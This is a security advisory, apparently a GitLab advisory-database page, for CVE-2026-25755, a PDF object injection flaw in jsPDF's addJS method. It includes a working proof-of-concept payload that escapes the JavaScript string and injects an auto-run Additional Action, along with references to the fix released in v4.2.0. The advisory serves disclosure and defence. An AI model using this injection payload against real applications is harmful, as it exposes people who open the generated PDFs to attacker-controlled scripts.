CVE-2026-25755: jsPDF has a PDF Object Injection via Unsanitized Input in addJS Method
(updated )
User control of the argument of the addJS method allows an attacker to inject arbitrary PDF objects into the generated document. By crafting a payload that escapes the JavaScript string delimiter, an attacker can execute malicious actions or alter the document structure, impacting any user who opens the generated PDF.
import { jsPDF } from "jspdf";
const doc = new jsPDF();
// Payload:
// 1. ) closes the JS string.
// 2. > closes the current dictionary.
// 3. /AA ... injects an "Additional Action" that executes on focus/open.
const maliciousPayload = "console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>";
doc.addJS(maliciousPayload);
doc.save("vulnerable.pdf");
References
- github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md
- github.com/advisories/GHSA-9vjf-qc39-jprp
- github.com/parallax/jsPDF
- github.com/parallax/jsPDF/commit/56b46d45b052346f5995b005a34af5dcdddd5437
- github.com/parallax/jsPDF/releases/tag/v4.2.0
- github.com/parallax/jsPDF/security/advisories/GHSA-9vjf-qc39-jprp
- nvd.nist.gov/vuln/detail/CVE-2026-25755
Code Behaviors & Features
Detect and mitigate CVE-2026-25755 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →